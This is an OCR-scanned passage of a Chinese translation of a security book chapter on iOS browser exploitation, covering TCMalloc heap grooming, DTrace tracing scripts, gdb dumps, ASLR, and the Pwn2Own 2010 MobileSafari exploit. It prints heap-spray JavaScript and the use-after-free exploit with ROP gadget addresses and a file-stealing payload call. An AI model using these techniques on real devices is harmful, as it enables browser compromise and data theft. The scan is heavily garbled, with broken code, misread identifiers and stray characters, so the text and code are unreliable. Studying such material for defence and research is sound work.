触发 垃圾 收集 器 的 过 程 基本 是 一 样 的 。 我 们 需要 利用 若干 个 对 象 来 触发 第 三 种 情形 的 行为 , 这 些 
对 象 可 以 是 图 像 、 数 组 和 字符 串 。 大 家 在 之 后 会 看 到 Pwn2Own 案 例 研究 中 使 用 了 字符 串 和 数组 ， 
不 过 具体 选择 什么 对 象 取 决 于 所 要 考虑 的 bug。 

接 下 来 就 是 要 找到 一 些 尽 可 能 受 自己 控制 的 对 象 , 用 它们 将 堆 驯 服 , 并 且 在 有 对 象 生存 期 问 
题 时 替换 出 错 的 对 象 。 一 般 情况 下 ,字符 串 和 数组 就 能 很 好 地 满足 这 些 要 求 。 多 数 情 况 下 ,大 家 
要 特别 注意 控制 用 于 替换 出 错 对 象 的 那些 对 象 的 前 4 个 字 节 , 因为 这 4 个 字 节 是 虚拟 函数 表 指 针 所 
在 的 位 置 ， 而 控制 它 往 往 是 获取 代码 执行 权 的 最 简单 方式 。 



















































































7.5.2 ”用 于 调试 堆 操 作 代 码 的 工具 


调试 堆 操 作 代 码 可 能 有 点 儿 环 手 ， 而 且 Mac OS X 或 iPhone 中 自 带 的 工具 并 不 支持 TCMalloc 
的 堆 调 试 。 因 为 iPhone 和 Mac OSX 上 的 TCMalloc 使 用 了 相同 的 实现 方式 , 所 以 大 家 可 以 在 Mac OS 
X 上 利用 Dtrace 完 成 需要 进行 的 全 部 调试 工作 。 本 节 并 未 介绍 与 Dtrace 和 D 话 言 有 关 的 细节 ， 只 是 
展示 了 两 个 用 于 简化 调试 过 程 的 脚本 。 这 两 个 脚本 对 于 大 家 的 漏洞 攻击 工作 而 言 特 别 有 用 。 

第 一 个 脚本 会 记录 所 有 大 小 的 对 象 的 分 配 情况 ， 并 打印 栈 记录 : 


#pragma D option mangled 








BEGIN 
{ 
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printf("let's start with js tracing"); 





pidstarget:JavaScriptCore: ZN3WwTFl0fastMallocEm:entry 
{ 

printf ("Size %d\n", arg0); 

ustack (4); 


} 
第 二 个 脚本 让 大 家 可 以 记录 特定 大 小 的 对 象 的 分 配 和 释放 情况 : 


#pragma D option mangled 
BEGIN 
{ 





printf("let's start with allocation tracing"); 


} 





pidstarget:JavaScriptCore:_ ZN3WTFl0fastMallocEm:entry 
{ 
self->size = arg0; 


} 





pidstarget:JavaSscriptCore: ZN3WwTFl0fastMallocEm:return 
/self->size == 60/ 
{ 

printf ("Pointer Ox%x\n", argl); 

addresses [arg1] = 1; 

ustack (2) ; 








pidstarget:JavaScriptCore: ZN3WwTF8fastFreeEPv:entry 
/addresses[larg0]/ 
{ 


addresses[larg0] = 0; 
printf ("Object freed 0x%x\n", arg0); 
ustack (2); 


} 

要 把 结果 从 Mac OS XX 迁移 到 iOS， 大 家 唯一 要 做 的 就 是 确定 合适 的 对 象 大 小 ， 而 在 这 两 种 系 
统 中 ， 这 个 大 小 可 能 不 同 。 不过， 要 做 到 这 一 点 是 相当 简单 的 ， 其 实在 大 多 数 情况 下 ， 在 二 进 制 
文件 中 都 能 找 出 所 要 处 理 的 对 象 的 大 小 。 此 外 ,通过 对 Mac OSX 和 iOS 中 WebKit 的 二 进 制 文件 使 
用 BinDiff， 我 们 往往 也 可 以 得 知 这 一 大 小 。 

当 我 们 要 对 堆 喷 射 (heap spray ) 攻击 进行 调试 时 ， 就 会 用 到 男 一 个 宝贵 的 工具 一 一 vmmap， 
该 工具 让 大 家 可 以 看 到 进程 地 址 空间 中 的 完整 内 容 。 在 vmmap 的 输出 中 对 JavaScript 进 行 grep 操 
作 , 你 就 会 看 到 哪些 内 存 区 域 是 由 TCMalloc 分 配 的 。 在 必须 对 地 址 进行 一 些 猜测 时 ( 例如 , 在 把 
假 的 虚 函 数 表 指针 指向 由 攻击 者 控制 的 内 存 位 置 时 )， 了 解 常 见 的 地 址 范围 就 显得 很 实用 了 。 
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一 般 而 言 ， 在 为 iOS 开 发 漏洞 攻击 程序 时 ， 人 们 一 般 会 选择 使 用 Mac OS X 上 32 位 的 Safari， 
而 不 会 使 用 64 位 的 版 本 。 这 样 一 来 ， 两 个 版 本 间 对 象 大 小 和 分 配 程序 上 的 差异 会 显著 减少 。 


7.5.3” 堆 风水 : 以 TCMalloc 对 算术 漏洞 进行 攻击 


在 了 解 了 分 配 程序 .触发 垃圾 收集 器 的 方式 和 要 使 用 的 对 象 后 , 现在 我 们 可 以 着 手 塑造 堆 了 。 

我 们 的 计划 是 非常 简单 的 ， 第 一 步 是 分 配 若干 对 象 来 整理 堆 。 这 并 不 是 什么 复杂 技术 ， 而 且 
根据 开始 执行 漏洞 攻击 时 堆 的 状态 的 不 同 , 所 需 对 象 的 数目 也 可 能 略 有 变化 。 整 理 堆 是 非常 重要 
的 , 因为 这 样 才 有 可 能 保证 接 下 来 的 对 象 在 内 存 中 是 连续 分 配 的 。 在 完成 对 堆 的 整理 之 后 , 目标 
就 成 了 在 堆 中 对 象 之 间 “ 挖 坑 ”。 为 了 完成 这 一 工作 ， 我们 首先 要 分 配 一 些 对 象 ， 然 后 每 隔 一 个 
象 就 释放 一 个 对 象 。 至 此 ,就 要 开始 分 配 易 受 攻击 的 对 象 了 。 如 果 对 堆 的 整理 能 像 预 期 那样 起 
效 的 话 ， 在 堆 中 大 家 所 选择 的 两 个 对 象 间 就 会 含有 一 个 易 受 攻击 的 对 象 。 

最 后 一 步 就 是 触发 bug， 夺 取代 码 执行 权 。 

下 面 的 代码 段 说 明了 获得 正确 堆 布 局 所 需 的 过 程 。 大 家 可 以 利用 7.5.2 节 中 给 出 的 Dtrace 脚 本 
追踪 分 配 情况 ， 并 验证 这 些 JavaScript 代 码 可 以 正常 工作 : 

<html> 


<body onload="start()"> 
<script> 


















































> 








Var shui = new Array(10000); 

Var gcForce = new Array(30000); //30 000 应 该 足以 触发 垃圾 收集 了 
trigger a garbage collection 

Var vulnerable = new Array(10); 


function allocateObjects() 
{ 
for(i = 0; i < shui.length; i++) 
shui[il] = String.fromCharCode (0x8181, Ox8181, Ox8181, 0x8181, 0x8181, 0x8181, 
0x8181; 0x8181,; 0x8181, 0x8181; 0x8181, Ox8181, Ox8181; 0x8181, 0x8181, 0x8181, 0x8181; 
0x8181; 0x8181; Ox8L181); 
} 


function createHoles () 
{ 
for(i = 0; i < shui.length; i+=2) 
delete shui[il]; 
} 


function forceGC() { 
for(i = 0; i < gcForce.length; i++) 
gcForcel[i] = String.fromCharCode (0x8282, 0x8282, 0x8282, 0x8282, 


0x8282, 0x8282, 0x8282, 

0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 
0x8282, 0x8282, 
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 
0x8282, 0x8282, 
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 
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0x8282, 0x8282, 

0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 
0x8282, 0x8282, 

0x8282, 0x8282, 0x8282, 0x8282, 0x8282); 

} 


function allocateVulnerable() { 
for(i = 0; i < vulnerable.length; i++) 
vulnerable[i] = document.createElement ("div"); 





function start() { 
alert ("Attach here"); 
allocateObjects () ; 
createHoles (); 
forceGC (); 
allocateVulnerable(); 


} 
</SCriSt> 


</body> 
</html> 


在 完全 理解 这 段 代码 之 前 ,大 家 还 需要 考虑 一 些 事情 。 首先 , 了解 易 受 攻击 的 对 象 的 大 小 是 
至 关 重 要 的 ， 大 家 在 这 里 要 处 理 的 是 大 小 为 60 字 节 的 HTML div 元 素 。 大 家 可 以 使 用 不 同 的 方法 
确定 对 象 的 大 小 : 在 调试 器 中 动态 追踪 、 使 用 另 一 个 Dtrace 脚 本 ， 或 是 通过 在 反 汇 编程 序 中 查看 
对 象 的 构造 函数 静态 确定 。 

在 得 知 对 象 的 大 小 后 , 第 二 件 事 情 就 是 找到 恰当 的 方式 替换 对 象 。 查 看 WebKit 的 源 代 码 ,你 
就 会 看 到 下 面 这 些 初始 化 字符 串 的 代码 : 


PassRefPtr<StringcImp1I> StringImp1: :createUninitialized( 
unsigned length, UChar*& data) 
{ 





























if (!lJength) { 
data = 0; 
return empty(); 


} 


// 分 配 一 块 足够 大 的 缓冲 区 ， 以 容纳 StringImp1 结 构 体 以 及 它 所 和 包含 的 数据 。 
// 这 会 从 此 次 调用 中 移 除 一 次 堆 分 配 
if (length > ((std::numeric limits<unsigned>::max() - Sizeof(StringImp1) ) 
/\sizeof (UChar))) 
CRASH(); 
size t size = sizeof (StringImpl) + length * sizeof (UChar); 
StringImpl* string = static cast<StringImpl*>(fastMalloc (size)); 


data = reinterpret _ cast<UChar*>(string + 1); 
return adoptRef (new (string) StringImpl (length)); 
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因此 , 看 起 来 攻击 者 很 容易 控制 分 配 的 大 小 。 在 过 去 , 攻击 者 能 完全 控制 缓冲 区 的 所 有 内 容 
时 , 字符 串 的 用 处 甚至 更 大 。 而 现在 , 字符 串 已 经 不 那么 有 用 了 ， 因 为 没什么 显而易见 的 方法 可 


以 用 来 控制 缓冲 区 的 前 4 个 字 节 














。 尽 管 如 此 ， 出 于 本 章 的 需要 ， 接 下 来 还 是 





我 们 很 容易 改变 它们 的 大 小 ， 使 之 满足 易 受 攻击 的 对 象 对 大 小 的 要 求 。 





字符 串 长 度 


Size t Size = 


的 计算 方式 特别 重要 : 


SIizeof(StringImp1l) 


+ length * sizeof (UChar); 


会 使 用 字符 串 ， 因 为 


这 就 告诉 大 家 需要 在 自己 的 JavaScript 代 码 中 放 入 多 少 个 字符 。sringImpl 的 大 小 是 20 字 节 ， 





而 Uchar 的 长 度 是 2 字 方 。 因 此 ， 要 分 配 60 字 六 的 数据 ， 就 需要 JavaScript 守 符 串 中 的 20 个 


A 


子 付 。 


至 此 ， 大 家 已 经 做 好 准备 ， 可 以 验证 代码 能 否 正常 工作 了 ， 也 就 是 说 ， 验 证 HTML aiv 元 素 


dtrace: 


dtrace: 
dtrace: 
ID 28816: 


invalid address 


script 


是 否 被 分 配 到 字符 串 之 间 。 
在 浏览 如 中 运行 这 段 代码 ， 并 用 之 前 提供 的 Dtrace 脚 本 追踪 输出 ， 得 到 如 下 输出 : 


snaggs-MacBook-Air:~ snaggs$sudo dtrace -s Documents/Trainings/Mac\ hacking\ 
training/Materials/solutions_ day2/9_ WebKRit/traceReplace.d -p 1498 -o out2 

'Documents/Trainings/Mac hacking 
training/Materials/solutions_ day2/9_ WebKRit/traceReplace.d' 
2304 dynamic variable drops 

error on enabled probe ID 6 ( 
pid1l498:JavaScriptCore: ZN3WTF8fastFree 





(0x3) in action #3 


^Csnaggs-MacBook-Air:~ snaggs 
snaggs-MacBook-Air:~ snagg$cat out2 | grep 


WebCore.__ ZN7WebCorel4HTM 


_8Documenti 


WebCore. 
_8Documenti 


WebCore. 


_8Documenti 


WebCore. 


_8Documenti 


WebCore. 
_8Documenti 


WebCore. 


_8Documenti 


WebCore. 


_8Documenti 


WebCore. 


__ZN7WebCorel4HTM. 


ZN7WebCore14HTM 


ZN7WebCore14HTM 


__ZN7WebCorel4HTM 


ZN7WebCore14HTM 


ZN7WebCore14HTM 


__ ZN7WebCore14HTM 


DivElement6create 





E+0x1b 


DivElement6écreate 





E+0x1b 


DivElement6écreate 





E+0x1b 





DivElement6écreate 
E+0xl1b 


DivElement6écreate 





E+0x1b 


DivElement6écreate 





E+0x1b 


DivElement6écreate 





E+0x1b 


DivElement6écreate 








_8Documenti 


WebCore.__ ZN7WebCorel4HTM 


E+0x1b 

















DivElement6create 








HTMLDiV 


ERKNS_13Quali 


ERKNS_13Quali 


ERKNS_13Quali 


ERKNS_13Quali 


ERKNS_13Quali 


ERKNS_13Quali 


ERKNS_13Quali 


ERKNS_13Quali 





ERKNS_13Quali 
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EPv:entry): 





fiedNameE 


fiedNameE 


fiedNameE 


fiedNameE 


fiedNameE 


fiedNameE 


fiedNameE 


fiedNameE 





fiedNameE 


matched 6 probes 


PNS 


PNS 


PNS 


PNS 


PNS 


PNS 


PNS 


PNS 





PNS 


7.$ 驯服 TCMalloc 175 





_8DocumentE+0x1lb 





WebCcore ` ZN7WebCorel4HTMLDivElement6createERKNS_13QualifiedNameEPNS 


_8DocumentE+0Xx1b 
snaggs-MacBook-Air:~ snagg$cat out2 | grep HITMLDiV | wc -1 
10 


在 Dtrace 的 输出 中 我 们 可 以 看 到 10 个 易 受 攻击 的 对 象 。 把 gdb 附 加 到 进程 时 , 就 可 以 验证 这 些 
div 对 象 被 分 配 到 字符 串 之 间 。 从 Dtrace 输 出 的 这 10 个 易 受 攻击 的 对 象 中 任 选 一 个 ， 就 有 : 


2 8717 __ZN3WTFl0fastMallocEm:return Pointer 0x2e5ec00 

















JavaScriptCcore ` ZN3WTFl0fastMallocEm+0x1b2 








WebCore.__ZN7WebCorel4HTMLDivElement6createERKNS_ 13QualifiedNameEPNS 
_8DocumentE+0x1lb 


现在 就 可 以 用 gdb 检 查 内 存 了 : 


(gdb) x/40x 0x2e5ec00 


















































0x2e5ec00: 0xad0d2228 Oxad0d24cc 0x00000001 0x00000000 
0x2e5ec10: 0x6d2e8654 0x02f9cb00 0x00000000 0x00000000 
0x2e5ec20: 0x00000000 0x0058003c 0x00000000 0x00000000 
0x2e5ec30: 0x00306ed0 0x00000000 0x00000000 0x00000000 
0x2e5ec40: 0x02e5e480 0x00000014 0x02e5ec54 0x00000000 
0x2e5ec50: 0x00000000 0x81818181 0x81818181 0x81818181 
0x2e5ec60: 0x81818181 0x81818181 0x81818181 Ox81818181 
0x2e5ec70: 0x81818181 0x81818181 0x81818181 0x00000010 
0x2e5ec80: 0x00000000 0x00000030 0x00000043 0x00000057 
0x2e5ec90: 0x00000000 0x81818181 0x81818181 0x81818181 
(gdb) x/40x 0x2e5ec00 - 0x40 

0x2e5ebc0: 0x02e5ed00 0x00000014 0x02e5ebqd4 0x00000000 
0x2e5ebd0: 0x00000000 0x81818181 0x81818181 0x81818181 
0x2e5ebe0: 0x81818181 Ox81818181 0x81818181 Ox81818181 
0x2e5ebf0: 0x81818181 0x81818181 0x81818181 0x82828282 
0x2e5ec00: 0xad0d2228 Oxad0d24cc 0x00000001 0x00000000 
0x2e5ec10: 0x6d2e8654 0x02f9cb00 0x00000000 0x00000000 
0x2e5ec20: 0x00000000 0x0058003 忆 0x00000000 0x00000000 
0x2e5ec30: 0x00306ed0 0x00000000 0x00000000 0x00000000 
0x2e5ec40: 0x02e5e480 Ox00000014 0x02e5ec54 0x00000000 
0x2e5ec50: 0x00000000 0x81818181 0x81818181 0x81818181 
(gdb) 





很 明显 ， 在 div 对 和 象 的 前 面 和 后 面 都 是 具有 自 定义 内 容 ( 0x8181 ) 的 字符 串 。 

能 够 在 TCMalloc 中 重 写 应 用 程序 特有 的 数据 是 很 重要 的 , 这 是 因为 与 在 magazine malloc 程 序 
中 对 大 型 区 域 中 的 对 象 所 做 的 类 似 ， 堆 的 元 数据 与 各 个 堆 数 据 块 是 分 开 存 储 的 。 因 此 ， 重 写 
TCMalloc 的 缓冲 区 不 会 重 写 堆 的 元 数据 , 而 是 重 写 在 它 之 后 分 配 的 缓冲 区 。 因 此 , 还 想 利 用 老 套 
路 来 获取 代码 执行 权 是 不 可 能 了 。 














7.5.4 以 TCMalloc 就 对 象 生存 期 问题 进行 漏洞 攻击 
在 涉及 对 象 生 存 期 问题 时 ， 易 受 攻击 的 对 象 就 不 一 定 要 放 在 我 们 能 控制 的 两 个 对 象 之 间 了 ， 
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更 重要 的 是 确保 能 够 以 很 可 靠 的 方式 替换 对 象 。 在 这 种 情况 下 , 攻击 的 第 一 步 是 分 配 易 受 攻击 的 
对 象 , 接着 就 需要 执行 触发 对 象 释放 的 行为 。 下 一 步 是 分 配 足 够 多 的 大 小 与 易 受 攻击 对 象 一 致 的 
对 象 ， 确 保 发 生 垃 圾 收集 ， 与 此 同时 ， 要 用 自己 选择 的 对 象 蔡 换 易 受 攻击 的 对 象 。 至 此 ， 只 剩 下 
最 后 一 步 要 完成 ， 那 就 是 触发 “使 用 ”状态 ， 以 获取 代码 执行 权 。 

有 一 点 应 该 重点 注意 : 用 于 算术 漏洞 的 方法 也 可 以 用 于 对 象 生 存 期 问题 。 不 过 , 在 这 种 情况 
下 大 家 必须 特别 留心 所 使 用 对 象 的 大 小 和 所 分 配对 象 的 数量 。 其 实 , 在 第 一 次 对 堆 进 行 整理 时 就 
进行 垃圾 收集 了 ， 因 此 为 了 在 对 象 被 释放 后 再 触发 垃圾 收集 器 ， 需 要 数量 更 多 的 对 象 。 

当 我 们 释放 处 在 所 控制 对 象 之 间 的 对 象 时 会 发 生 同 样 的 问题 , 要 确保 易 受 攻击 的 对 象 都 被 放 
进 “ 坑 ”中 ,就 必须 再 触发 一 次 垃圾 收集 。 给 定 TCMalloe 的 结构 ， 触 发 垃圾 收集 器 进行 漏洞 攻击 
的 理想 方式 就 很 明确 了 , 我 们 要 使 用 与 易 受 攻击 的 对 象 大 小 不 同 的 对 象 。 事 实 上 ,这样 一 来 ,与 
易 受 攻击 的 对 象 对 应 的 自由 列表 不 会 发 生 太 大 变化 ， 可 以 减 小 漏洞 攻击 失败 的 概率 。 


7.6 对 ASLR 的 挑战 


iOS 4.3 之 前 都 可 不 用 考虑 ASLR( Address Space Layout Randomization , 地 址 空间 布局 随机 化 ) 
便 能 开发 ROP 有 效 载 荷 和 针对 ioOS 的 漏洞 攻击 程序 。 事 实 上 ， 虽 然 在 理解 攻击 者 控制 的 数据 会 被 
放置 在 进程 地 址 空间 的 哪个 位 置 时 仍 需要 猜测 , 但 在 ROP 有 效 载荷 的 开发 上 是 不 存在 问题 的 ， 
为 所 有 的 库 、 主 二 进 制 文件 和 动态 链接 器 都 被 放置 在 可 以 预知 的 地 址 。 

从 iOS 4.3 开 始 ， 蕴 果 公司 为 iPhone 引入 了 完整 的 ASLR 机 制 。 

iOS 上 的 ASLR 会 随机 排列 存储 在 avyla_sharea_cache 中 的 所 有 库 (动态 链接 器 、 堆 、 栈 )， 
如 果 应 用 程序 支持 与 位 置 无 关 的 代码 ， 那 么 主 可 执行 文件 也 是 可 以 随机 排列 的 。 

这 给 攻击 者 设置 了 诸多 难题 ， 主 要 有 两 点 : 一 是 没 办 法 在 有 效 载荷 中 使 用 ROP 了 ,一 是 在 查 
找 攻击 者 控制 的 数据 可 能 的 地 址 时 要 进行 猜测 。 

打败 ASLR 并 没有 什么 标准 化 的 方式 。 基 本 上 每 种 漏洞 攻击 都 可 能 有 属于 自己 的 特殊 方法 把 
有 用 的 地 址 泄露 给 攻击 者 。 

comex 设 计 的 Saffron 漏 洞 攻击 就 重新 利用 溢出 打败 了 ASLR。 在 这 种 攻击 中 ， 缺 少 对 某 个 参 
数 计数 器 的 检查 使 得 攻击 者 可 以 从 以 下 结构 体 读 写 数据 : 


typedef struct Tl1 DecoderRec_ 
{ 













































































T1_BuilderRec builder; 

FT_Long stack[T1_ MAX CHARSTRINGS_OPERANDS]; 
FT_Long* top; 

T1_Decoder_ ZoneRec zones[T1 MAX SUBRS_CALLS + 1]; 
T1_Decoder_Zone zone; 

FT_Service PsCMaps psnames; /* 用 于 seac */ 

pT ULntk num glyphs; 

FT_Byte** glyph_names; 
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六 起 lenIVyV; /* 子 例 程 调用 的 内 部 机 制 */ 
FP Ln num_subrs; 
FT_Byte** subrs; 
FT_PtrDist* subrs_len; /* 子 串 长 度 的 数组 (可 选 ) */ 
FT_ Matrix font _ matrix; 
FT_Vector font_offset; 
FT_Int flex_state; 
Br Tn num_ flex vectors; 
FT_Vector flex _ vectors[7]; 
PS_Blend blend; /* 用 于 支持 master support 字 体 */ 
FT_Render_Mode hint_mode; 
T1_Decoder_Callback parse_callback; 
T1_Decoder_FuncsRec funcs; 
FT_Long* buildchar; 
FT _ UTNEt len buildchar; 
FT_Bool Seac; 
} T1_DecoderRec; 











然后 攻击 者 会 读 人 包括 parse_callback 在 内 的 若干 指针 , 并 把 根据 通过 出 站 读 操 作 了 解 的 
情况 构造 的 ROP 有 效 载荷 存储 在 buildchar 成 员 中 。 最 后 ,攻击 者 会 重 写 parse_cal1back 成 员 ， 
并 触发 对 它 的 调用 。 至 此 ， 击 败 ASLR 的 ROP 有 效 载荷 已 经 执行 了 。 

一 般 而 言 ， 想 击败 ASLR 而 带 来 的 心理 负担 ， 以 及 通用 方法 的 缺乏 ， 都 大 大 增加 了 攻击 者 在 开发 
各 种 漏洞 攻击 程序 时 投入 的 精力 。 更 为 重要 的 是 ， 过 去 的 库 不 是 随机 排列 的 ， 因 此 有 可 能 不 用 进行 
猜测 , 这 样 构 建 有 效 载荷 就 不 是 个 问题 , 但 从 iOS 4.3 起 , 要 想 成 功 地 进行 漏洞 攻击 就 必须 打败 ASLR。 

7.7 节 分 析 了 一 种 不 需要 绕 过 ASLR 的 针对 MobileSafari 的 漏洞 攻击 程序 。 


























7.7 案例 研究 : Pwn2Own 2010 


这 一 节 所 进行 的 案例 研究 展示 了 在 2010 年 的 Pwn2Own 大 赛 中 折 桂 的 漏洞 攻击 程序 。 出 于 对 
本 章 讲述 范围 的 考虑 , 我 们 已 经 拿 掉 了 其 中 使 用 的 有 效 载荷 ， 因 为 本 书 会 在 其 他 章节 中 对 ROP 的 
概念 进行 很 好 地 解释 。 

函数 pwn () 是 负责 引导 该 漏洞 攻击 程序 的 。 我 们 要 做 的 第 一 件 事 就 是 生成 JavaScript 函 数 , 用 它 
来 创建 字符 串 数组 。 这 些 字符 串 是 用 fromcharcoaqe () 函数 创建 的 , 这 样 可 以 保证 所 创建 的 字符 串 
有 着 正确 的 大 小 ( 要 详细 了 解 WebKit 中 的 字符 串 实现 ， 可 以 回 过 头 去 参考 针对 TCMalloc 描 述 漏洞 
攻击 技巧 的 内 容 中 介绍 堆 风 水 的 例子 )。 每 个 字符 串 都 有 需要 被 蔡 换 的 对 象 的 大 小 〈20 个 UChar， 
也 就 是 40 字 节 ) 和 需要 分 配 的 字符 串 的 数量 ( 这 个 例子 中 是 4000 )。 其 余 的 参数 指定 了 字符 串 的 内 














图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 








178 第 7 章 漏洞 攻击 








容 。 字 符 串 中 装 入 了 一 些 漏洞 攻击 程序 特有 的 数据 ， 而 其 余 的 内 容 则 是 任意 的 值 ( 0xcccc )。 
漏洞 本 身 是 由 在 释放 属性 时 没有 正确 地 从 Node 缓 存 中 删除 的 属性 对 象 引 起 的 。pwn () 函数 的 

其 余部 分 负责 分 配 若干 属性 对 象 ， 并 在 分 配 之 后 立即 远程 控制 它们 。 

至 此 ， 漏 洞 攻击 程序 会 通过 调用 nodaespray () 函数 (这 是 一 开始 由 getNodespray () 生 成 
的 函数 ) 触发 垃圾 收集 器 。 除 了 触发 垃圾 收集 器 从 而 确保 分 配 程序 释放 这 些 属性 对 象 ， 我 们 还 要 
用 大 小 合适 的 字符 串 蔡 换 这 些 对 象 。 

最 后 一 步 就 是 用 需要 执行 的 shellcode 喷 射 堆 ， 并 触发 对 虚 函 数 (本 例 中 是 focus () 函数 ) 的 
调用 。 这 样 一 来 ， 用 于 替换 对 象 的 字符 串 的 前 4 个 字 节 就 起 到 了 虚 函 数 表 指 针 的 作用 ， 并 将 代码 
执行 转移 到 由 攻击 者 控制 的 区 域 。 


<html> 
<body onload="pwn()"> 
<script> 

































































function genNodeSpray3Gs (len, count, addyl, addy2, retl1, ret2, cc, 
objname) { 


Var evalstr = "function nodeSpray() 
{ for(var i = 0; i < "+ Count +" I++ { " 
evalstr += objname + "[i]" + " = String.fromCharCode("; 


Var slide = Oxilc; 


for (var i = 0; i < len; i++) { 
EE 位 EE 让 小 攻 
evalstr += addyl; 
-elser TE (TL ea | 生 二 -7 蒜 


evalstr += addy2; 
evalstr += addyl + slide; 


yeLlse. i1f(1 ==: 18) { 
evalstr +=ret2; 
yelse if(1 ==: 19) { 


evalstr += retl1; 

} else if (i > 1 && i< 4) { 
evalstr += c¢; 

} else { 
evalstr += 0; 


} 
if (i != len-1) { 
evalstr += "," 
} 
} 
evalstr += "); }}"; 


return evalstr; 


} 

function genNodeSpray (len, count, addyl, addy2, c, objname) { 
var evalstr = "function nodeSpray() { for 

(var = 0; i<" + Count + "; i++) { " 
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evalstr += objname + "[i]" + "= String.fromCharCode("; 


for (var i = 0; i < len; i++) { 

if£ (14 == 0) { 
evalstr += addyl; 

} else if (i == 1) { 
evalstr += addy2; 

} else if (i > 1 && i< 4) { 
evalstr += c; 

} else { 
evalstr += 0; 





if (i != len-1) { 
evalstr += ","; 
} 
} 
evalstr += "); }}"; 


return evalstr; 


function pwn() 

{ 
Var obj = new Array(4000); 
Var attrs = new Array (100); 


// Safari 4.0.5 (64 bit, both DEBUG & RELEASE) 74 bytes -> 37 UChars 
// Safari 4.0.5 (32 bit, both DEBUG & RELEASE) 40 bytes -> 20 UChars 
// MobileSafari/iPhone 3.1.3 40 bytes -> 20 UChars 

// 0x4alc000 --> 0 open pages 

// Ox4d00000 --> 1 open page 


//eval (genNodeSpray (20, 8000, 0x0000, 0x0500, 52428, "obj")); 


























eval (genNodeSpray3GS (20, 4000, 0x0000, 0x0600, 0x328c, 0x23ef, 52428, "obj")); 


// ioS 3.1.3 (2G/3G) : 
// gadget to gain control of SP, located at 0x33b4dqc92 (libSystem) 


{3 

// 33b4dc92 469d mov SD; 芋 3 

// 33b4dc94 bclc pop 十 人 主 3 让 本 

// 33b4dc96 4690 mov 3 汪 2 

// 33b4dc98 469a mov El 

// 33b4dc9a 46a3 mov fp, r4 

// 33b4dc9c bdf0 pop .a 
/¥ 


// note that we need to use jumpaddr+l1 to enter thumb mode 

// [for 10S 3.0 (2G/3G) use gadget at 0x31d8e6b4] 

LU/ 

PAA 

// i0OSsS 3.1.3 3GS : 

// 

// gadget to gain control of SP, a bit more involved we can't mov r3 in sp so we 
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do it in two stages: 


// 

// 3298d162 6a07 ldr EJ LEO 非 3 有 2] 
// 3298d164 f8dq0d028 ldr.w sp, [r0, #40] 
// 3298d168 6a40 ldr r0, [r0, #36] 
// 3298dq16a 4700 bx r0 

fl 


// r0 is a pointer to the crafted node. We point r7 to our crafted stack, and 
r0 to 0x328c23ee. 
// the stack pointer points to something we don't control as the node is 40 bytes 


long. 
人 
// 328c23ee fla70d00 Sub .w sp, r7, #0 ; 0x0 
// 328c23f2 bd80 pop {r7, pc} 
// 
//3GS 
Var trampoline = "123456789012" + encode uint32(0x3298d163); 
//var ropshellcode = vibrate rop 3 1 3 gs(); 
//we have to skip the first 28 bytes 
Var ropshellcode = stealFile rop 3 1 3 gs(0x600001c); 
//3G 
//var trampoline = "123456789012" + encode uint32 (0x33b4dc93); 
//var ropshellcode = vibrate rop 3 1 3 9g(); 
for(var i = 0; i < attrs.length; i++) { 
attrs[i] = document.createAttribute('PWN'); 
attrs[i] .nodeVvalue = 0; 
} 
// dangling pointers are us. 
for(var i = 0; i < attrs.length; i++) { 
// bug trigger (used repeatedly to increase reliability) 
attrs[i] .removeChild(attrs[il].childNodes[0]); 
} 
nodeSpray (); 
// no pages open: we can spray 10000 strings w/o SIGKILL 
// 1 page open: we can only spray 8000 strings w/o SIGKILL 
Var retaddrs = new Array(20000); 
for(var i = 0; i < retaddrs.length; i++) { 
retaddrs[i] = trampoline + ropshellcode; 
} 
// use after free on WebCore::Node object 
// overwritten vtable pointer gives us control over PC 
attrs[50] .childNodes[0] .focus(); 
} 
</script> 
</body> 
</html> 
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7.8 测试 基础 设施 


在 开发 漏洞 攻击 程序 的 过 程 中 ， 当 我 们 需要 确定 最 适合 使 用 的 测试 基础 设施 时 , 有 些 困难 就 
开始 显现 出 来 。 

对 漏洞 攻击 程序 进行 测试 时 有 许多 因素 需要 考虑 。 首先 , 用 于 测试 的 应 用 程序 要 与 漏洞 攻击 
程序 所 要 攻击 的 应 用 程序 版 本 相同 , 或 者 尽 可 能 接近 。 测试 平台 上 分 配 程序 的 活动 需要 尽量 接近 
真实 分 配 程序 的 表现 。 最 后 ， 我 们 还 必须 要 有 简单 的 办 法 多 次 测试 漏洞 攻击 程序 。 

一 般 而 言 ， 在 进行 开发 时 ， 掌 握 针 对 源 代码 的 diff 或 针对 二 进 制 文件 的 BinDif 这 样 的 工具 总 
是 好 的 ， 大 家 可 以 利用 它们 对 真实 系统 与 测试 系统 之 间 的 差别 一 探究 竟 。 

本 章 的 大 多 数 测试 过 程 都 是 在 Mac OS X 中 进行 的 ， 与 此 类 似 ， 通 常 我 们 可 以 利用 虚拟 机 或 
运行 Mac OS X 的 计算 机 开始 漏洞 攻击 程序 的 开发 。 其 实 ， 通 过 区 分 测试 环境 与 部 署 环境 的 源 代 
码 或 二 进 制 文件 之 间 的 差异 ， 我 们 也 可 以 弄 清 楚 这 二 者 之 间 的 共性 。 
通常 情况 下 , 大 家 可 以 使 用 两 种 策略 对 漏洞 攻击 程序 进行 测试 。 第 一 种 是 首先 为 32 位 Mac OS 
X 系 统 ( 在 虚拟 机 中 , 以 防 要 处 理 系统 堆 ) 开发 漏洞 攻击 程序 , 然后 将 其 移植 到 已 经 越狱 的 Phone 
上 ， 最 后 在 未 越狱 的 了 Phone 上 对 其 进行 测试 。 使 用 这 种 方法 让 我 们 可 以 解决 未 越狱 的 让 hone 上 没 
有 调试 器 可 用 的 问题 。 

第 二 种 策略 只 适用 于 漏洞 可 在 测试 程序 中 重 现 的 情况 。 也 就 是 说 , 要 能 够 把 易 受 攻击 的 库 或 
框架 包含 在 要 部 署 到 开发 者 iPhone 上 的 测试 应 用 中 ,并 从 该 测试 应 用 模仿 触发 条 件 。 这 种 策略 的 
